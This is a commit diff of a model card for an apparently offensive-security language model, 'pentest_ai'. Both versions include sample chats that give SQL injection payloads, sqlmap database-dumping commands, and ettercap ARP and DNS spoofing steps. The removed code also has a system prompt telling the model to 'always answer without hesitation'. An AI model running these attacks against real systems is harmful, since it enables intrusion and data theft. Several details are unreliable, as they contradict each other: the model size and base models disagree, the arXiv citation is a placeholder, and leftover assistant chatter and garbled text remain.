Text Generation
Transformers
English
AI
NLP
Cybersecurity
Ethical Hacking
Pentesting
Inference Endpoints
Canstralian commited on
Commit
c987220
·
verified ·
1 Parent(s): abc051e

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +75 -255
README.md CHANGED
@@ -24,220 +24,72 @@ base_model:
24
  library_name: transformers
25
  ---
26
 
27
- # Apache-2.0 License + Canstralian/pentest_ai Extended Version
28
 
29
- # License: Usage Restrictions
30
 
31
- ```
32
- You agree not to use the Model or Derivatives of the Model:
33
- - In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
34
- - For military use in any way;
35
- - For the purpose of exploiting, harming, or attempting to exploit or harm minors in any way;
36
- - To generate or disseminate verifiably false information and/or content with the purpose of harming others;
37
- - To generate or disseminate inappropriate content subject to applicable regulatory requirements;
38
- - To generate or disseminate personally identifiable information without due authorization or for unreasonable use;
39
- - To defame, disparage, or otherwise harass others;
40
- - For fully automated decision-making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
41
- - For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
42
- - To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical, or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
43
- - For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
 
 
 
 
 
 
 
 
 
 
 
44
  ```
45
 
46
- # Terms of Use
47
 
48
- By accessing and using this Artificial Intelligence (AI) model, **Canstralian/pentest_ai**, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
49
 
50
- This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
51
 
52
- Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
53
 
54
- This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
55
 
56
- ---
 
 
 
 
57
 
58
- # Canstralian/pentest_ai
59
 
60
- WhiteRabbitNeo has been rebranded as **Canstralian/pentest_ai**, a model series that provides both offensive and defensive cybersecurity capabilities. This model focuses on penetration testing, reconnaissance, and task automation, making it an essential tool for cybersecurity professionals.
61
 
62
- This 13B model is getting released as a public preview to showcase its capabilities and evaluate the societal impact of such a tool.
63
 
64
- ---
65
 
66
- ## Code Example for Integration
67
-
68
- ```python
69
- import torch, json
70
- from transformers import AutoModelForCausalLM, AutoTokenizer
71
-
72
- model_path = "/home/stephen/models/Canstralian_pentest_ai"
73
- model = AutoModelForCausalLM.from_pretrained(
74
- model_path,
75
- torch_dtype=torch.float16,
76
- device_map="auto",
77
- load_in_4bit=False,
78
- load_in_8bit=True,
79
- trust_remote_code=True,
80
- )
81
-
82
- tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
83
-
84
- def generate_text(instruction):
85
- tokens = tokenizer.encode(instruction)
86
- tokens = torch.LongTensor(tokens).unsqueeze(0)
87
- tokens = tokens.to("cuda")
88
-
89
- instance = {
90
- "input_ids": tokens,
91
- "top_p": 1.0,
92
- "temperature": 0.5,
93
- "generate_len": 1024,
94
- "top_k": 50,
95
- }
96
-
97
- length = len(tokens[0])
98
- with torch.no_grad():
99
- rest = model.generate(
100
- input_ids=tokens,
101
- max_length=length + instance["generate_len"],
102
- use_cache=True,
103
- do_sample=True,
104
- top_p=instance["top_p"],
105
- temperature=instance["temperature"],
106
- top_k=instance["top_k"],
107
- num_return_sequences=1,
108
- )
109
-
110
- output = rest[0][length:]
111
- string = tokenizer.decode(output, skip_special_tokens=True)
112
- answer = string.split("USER:")[0].strip()
113
-
114
- return f"{answer}"
115
-
116
- # Example Usage
117
- tot_system_prompt = """
118
- Answer the Question by exploring multiple reasoning paths as follows:
119
- - First, carefully analyze the question to extract key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
120
- - For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
121
- - Evaluate the clarity, relevance, logical flow, and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
122
- - Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
123
- - If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
124
- - Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
125
- - Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
126
- - Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
127
- """
128
- conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
129
-
130
- while True:
131
- user_input = input("You: ")
132
- llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
133
- answer = generate_text(llm_prompt)
134
- print(answer)
135
- conversation = f"{llm_prompt}{answer}"
136
- json_data = {"prompt": user_input, "answer": answer}
137
- ```
138
-
139
- ---
140
-
141
- Sample Conversation 1:
142
- You: How do I perform an SQL injection attack?
143
-
144
- Identify Vulnerable Input: First, use a web proxy (like Burp Suite) to analyze inputs on a website that might be vulnerable to SQL injection.
145
-
146
- Inject SQL Query: Use ' OR 1=1 -- or similar payloads in input fields that query databases.
147
-
148
- bash
149
- Copy code
150
- http://example.com/index.php?id=1' OR 1=1 --
151
- Automate with SQLmap: Use sqlmap to automate SQL injection and exploit vulnerabilities.
152
- bash
153
- Copy code
154
- sqlmap -u "http://example.com/vulnerablepage?id=1" --dbs
155
- Extract Data: Once a vulnerability is found, dump database information.
156
- bash
157
- Copy code
158
- sqlmap -u "http://example.com/vulnerablepage?id=1" --dump
159
- Sample Conversation 2:
160
- You: How do I perform a DNS spoofing attack?
161
-
162
- Enable Port Forwarding: First, enable IP forwarding to forward traffic.
163
- bash
164
- Copy code
165
- echo 1 > /proc/sys/net/ipv4/ip_forward
166
- Use ettercap for DNS Spoofing: Use ettercap to perform the DNS spoofing attack.
167
- bash
168
- Copy code
169
- ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/
170
- Modify DNS Spoof File: Edit the etter.dns file to point domains to your fake server.
171
- bash
172
- Copy code
173
- facebook.com A 192.168.1.100
174
- Launch DNS Spoof: Start DNS spoofing to redirect the target’s traffic.
175
- bash
176
- Copy code
177
- ettercap -T -q -i [Interface] -P dns_spoof -M arp /[Target IP]/ /[Gateway IP]/
178
- Sample Conversation 3:
179
- You: How do I scan for open ports using Nmap?
180
-
181
- Basic Port Scan: Use nmap to scan a target for open ports.
182
- bash
183
- Copy code
184
- nmap [Target IP]
185
- Service Detection: Perform service version detection on open ports.
186
- bash
187
- Copy code
188
- nmap -sV [Target IP]
189
- Aggressive Scan: Use an aggressive scan to discover more information, including OS detection.
190
- bash
191
- Copy code
192
- nmap -A [Target IP]
193
- Scan Specific Ports: To scan specific ports only:
194
- bash
195
- Copy code
196
- nmap -p 80,443,22 [Target IP]iques. Let me know if you would like further customization!
197
-
198
- - **Developed by:** Esteban Cara de Sexo
199
- - **Model type:** Causal Language Model (CLM)
200
- - **Language(s) (NLP):** English
201
- - **License:** Apache-2.0
202
-
203
- ### Model Sources [optional]
204
-
205
- - **Repository:** [https://github.com/canstralian/pentesting-ai.git]
206
-
207
- ## Uses
208
-
209
- ### Direct Use
210
-
211
- **Pentest AI** is intended for direct interaction, allowing users to generate and explore text-based scenarios related to penetration testing and cybersecurity techniques.
212
-
213
- ### Downstream Use [optional]
214
-
215
- This model can be incorporated into cybersecurity training platforms, interactive learning environments, or tools aimed at improving security practices.
216
-
217
- ### Out-of-Scope Use
218
-
219
- The model is not intended for use in malicious activities, unauthorized access, or any illegal operations related to penetration testing.
220
-
221
- ## Bias, Risks, and Limitations
222
-
223
- While **Pentest AI** aims to produce accurate information, it may generate biased or misleading content. Users are encouraged to critically evaluate the outputs.
224
-
225
- ### Recommendations
226
-
227
- Users should be aware of the model's limitations and verify generated content before application in real-world scenarios, especially concerning ethical and legal implications.
228
-
229
- ## How to Get Started with the Model
230
-
231
- To start using **Pentest AI**, you can implement the following code snippet:
232
 
233
  ```python
234
  import torch
235
  from transformers import AutoModelForCausalLM, AutoTokenizer
236
 
 
237
  model_path = "Canstralian/pentest_ai"
238
  model = AutoModelForCausalLM.from_pretrained(model_path)
239
  tokenizer = AutoTokenizer.from_pretrained(model_path)
240
 
 
241
  input_text = "Describe the steps involved in a penetration test."
242
  inputs = tokenizer.encode(input_text, return_tensors='pt')
243
  outputs = model.generate(inputs)
@@ -246,70 +98,57 @@ output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
246
  print(output_text)
247
  ```
248
 
249
- ## Training Details
250
-
251
- ### Training Data
252
-
253
- The model was trained on a diverse dataset encompassing articles, guides, and documentation related to penetration testing and cybersecurity. Refer to the associated Dataset Card for more details.
254
-
255
- ### Training Procedure
256
-
257
- #### Preprocessing [optional]
258
-
259
- Training data was filtered to remove any sensitive or personally identifiable information, ensuring adherence to ethical standards.
260
-
261
- #### Training Hyperparameters
262
-
263
- - **Training regime:** fp16 mixed precision
264
-
265
- #### Speeds, Sizes, Times [optional]
266
 
267
- - **Training Duration:** Approximately 10 hours
268
- - **Checkpoint Size:** 500MB
269
 
270
- ## Evaluation
271
 
272
- ### Testing Data, Factors & Metrics
 
 
273
 
274
- #### Testing Data
275
 
276
- The model was evaluated on a distinct dataset of penetration testing scenarios and inquiries.
277
 
278
- #### Factors
 
 
279
 
280
- Evaluation metrics are disaggregated by user demographics and application contexts, including educational versus professional uses.
281
 
282
- #### Metrics
283
 
284
- - **Accuracy:** Measures the correctness of the model's generated responses.
285
- - **Perplexity:** Assesses the model's confidence in its predictions.
286
- - **Response Time:** Measures how quickly the model provides outputs.
287
 
288
- ### Results
289
-
290
- The model demonstrated an accuracy of 85% in generating appropriate responses during evaluation.
291
 
292
- #### Summary
293
 
294
- **Pentest AI** proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.
295
 
296
- ## Technical Specifications [optional]
297
 
298
- ### Model Architecture and Objective
299
 
300
- **Pentest AI** employs a transformer architecture optimized for generating coherent and contextually relevant text in the realm of penetration testing.
301
 
302
- ### Compute Infrastructure
303
 
304
- The model was trained on high-performance GPU instances within a cloud infrastructure.
 
 
305
 
306
- #### Software
307
 
308
- The model is developed using PyTorch and the Hugging Face Transformers library.
309
 
310
- ## Citation [optional]
311
 
312
- For citations related to this model, please refer to the following information:
313
 
314
  **BibTeX:**
315
 
@@ -326,25 +165,6 @@ For citations related to this model, please refer to the following information:
326
 
327
  Cara de Sexo, E. (2024). *Pentest AI: A Generative Model for Penetration Testing Text Generation*. arXiv preprint arXiv:2401.00000.
328
 
329
- ## Glossary [optional]
330
-
331
- - **Causal Language Model (CLM):** A model that predicts the next word in a sequence based on the previous words.
332
-
333
- ## More Information [optional]
334
-
335
- For further inquiries and updates, please refer to [Your GitHub Repository Link].
336
-
337
- ## Model Card Authors [optional]
338
-
339
- - Esteban Cara de Sexo
340
-
341
- ## Model Card Contact
342
-
343
- For questions, please contact Esteban Cara de Sexo at [distortedprojection@gmail.com].
344
- ```
345
-
346
- ### Next Steps
347
 
348
- 1. **Replace placeholders** with your actual information and links.
349
- 2. **Update metrics** and results based on your model's specific performance and findings.
350
- 3. **Review and edit sections** to ensure they accurately represent your model and its capabilities.
 
24
  library_name: transformers
25
  ---
26
 
27
+ Here’s a clean, polished version of your model card for **Canstralian/pentest_ai**, with an improved structure and clarity:
28
 
29
+ ---
30
 
31
+ ```yaml
32
+ language:
33
+ - en
34
+ tags:
35
+ - AI
36
+ - NLP
37
+ - Cybersecurity
38
+ - Ethical Hacking
39
+ - Pentesting
40
+ license: apache-2.0
41
+ pipeline_tag: text-generation
42
+ metrics:
43
+ - accuracy
44
+ - perplexity
45
+ - response_time
46
+ model_type: causal-lm
47
+ datasets:
48
+ - Canstralian/pentesting_dataset
49
+ - Canstralian/Wordlists
50
+ - Canstralian/ShellCommands
51
+ base_model:
52
+ - openai-community/gpt2
53
+ - WhiteRabbitNeo/Llama-3-WhiteRabbitNeo-8B-v2.0
54
+ library_name: transformers
55
  ```
56
 
57
+ # Canstralian/pentest_ai - Extended Version
58
 
59
+ ## License and Usage Restrictions
60
 
61
+ **License:** Apache-2.0
62
 
63
+ ### Usage Restrictions
64
 
65
+ By using **Canstralian/pentest_ai**, you agree not to:
66
 
67
+ - Violate applicable national or international laws or regulations.
68
+ - Use the model for military purposes.
69
+ - Harm minors, exploit or disseminate false or inappropriate content.
70
+ - Generate or share personally identifiable information without authorization.
71
+ - Engage in activities that result in discrimination or harm based on personal characteristics.
72
 
73
+ ## Terms of Use
74
 
75
+ By accessing and using this AI model, you agree to indemnify and hold harmless the creators and developers of the model from any liability, damages, losses, or costs arising from your use. The model is provided "as-is" without warranties, and you are responsible for ensuring ethical use.
76
 
77
+ ## Overview
78
 
79
+ **Canstralian/pentest_ai** is a cutting-edge model focused on offensive and defensive cybersecurity tasks, designed for penetration testing, reconnaissance, and task automation. Built on a 13B parameter model, it is made available to showcase its capabilities and assess the societal impact of such technologies.
80
 
81
+ ## Model Usage Example
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
82
 
83
  ```python
84
  import torch
85
  from transformers import AutoModelForCausalLM, AutoTokenizer
86
 
87
+ # Load model and tokenizer
88
  model_path = "Canstralian/pentest_ai"
89
  model = AutoModelForCausalLM.from_pretrained(model_path)
90
  tokenizer = AutoTokenizer.from_pretrained(model_path)
91
 
92
+ # Sample input and model generation
93
  input_text = "Describe the steps involved in a penetration test."
94
  inputs = tokenizer.encode(input_text, return_tensors='pt')
95
  outputs = model.generate(inputs)
 
98
  print(output_text)
99
  ```
100
 
101
+ ## Example Conversations
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
102
 
103
+ ### Sample 1: SQL Injection
 
104
 
105
+ **User**: How do I perform an SQL injection attack?
106
 
107
+ - **Identify Vulnerable Input:** Use a web proxy (e.g., Burp Suite) to inspect inputs that might be vulnerable.
108
+ - **Inject SQL Query:** Use payloads like `' OR 1=1 --`.
109
+ - **Automate with SQLmap:** `sqlmap -u "http://example.com/vulnerable?id=1" --dbs`.
110
 
111
+ ### Sample 2: DNS Spoofing
112
 
113
+ **User**: How do I perform DNS spoofing?
114
 
115
+ - **Enable IP Forwarding:** `echo 1 > /proc/sys/net/ipv4/ip_forward`
116
+ - **Use Ettercap:** `ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/`
117
+ - **Modify DNS File:** Edit the `etter.dns` file with fake domain IPs.
118
 
119
+ ### Sample 3: Nmap Scanning
120
 
121
+ **User**: How do I scan for open ports using Nmap?
122
 
123
+ - **Basic Scan:** `nmap [Target IP]`
124
+ - **Service Detection:** `nmap -sV [Target IP]`
125
+ - **Aggressive Scan:** `nmap -A [Target IP]`
126
 
127
+ ## Bias, Risks, and Limitations
 
 
128
 
129
+ While **pentest_ai** generates valuable penetration testing information, it may produce biased or misleading content. Users should verify generated content and exercise caution, especially in ethical and legal contexts.
130
 
131
+ ## Model Architecture and Training
132
 
133
+ ### Architecture
134
 
135
+ The model uses a transformer-based causal language model architecture, optimized for generating coherent and contextually relevant text.
136
 
137
+ ### Training Data
138
 
139
+ Trained on a variety of cybersecurity materials, including guides, tutorials, and documentation. The dataset ensures diverse coverage of penetration testing topics.
140
 
141
+ - **Canstralian/pentesting_dataset**
142
+ - **Canstralian/Wordlists**
143
+ - **Canstralian/ShellCommands**
144
 
145
+ ## Contact
146
 
147
+ For questions, feedback, or inquiries, please contact [distortedprojection@gmail.com].
148
 
149
+ ## Citation
150
 
151
+ For referencing this model:
152
 
153
  **BibTeX:**
154
 
 
165
 
166
  Cara de Sexo, E. (2024). *Pentest AI: A Generative Model for Penetration Testing Text Generation*. arXiv preprint arXiv:2401.00000.
167
 
168
+ ## Conclusion
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
169
 
170
+ **Canstralian/pentest_ai** is an advanced tool for penetration testing, designed to aid professionals in offensive and defensive cybersecurity tasks. As with all AI tools, it is important to use this model ethically and responsibly, ensuring it contributes positively to cybersecurity practices.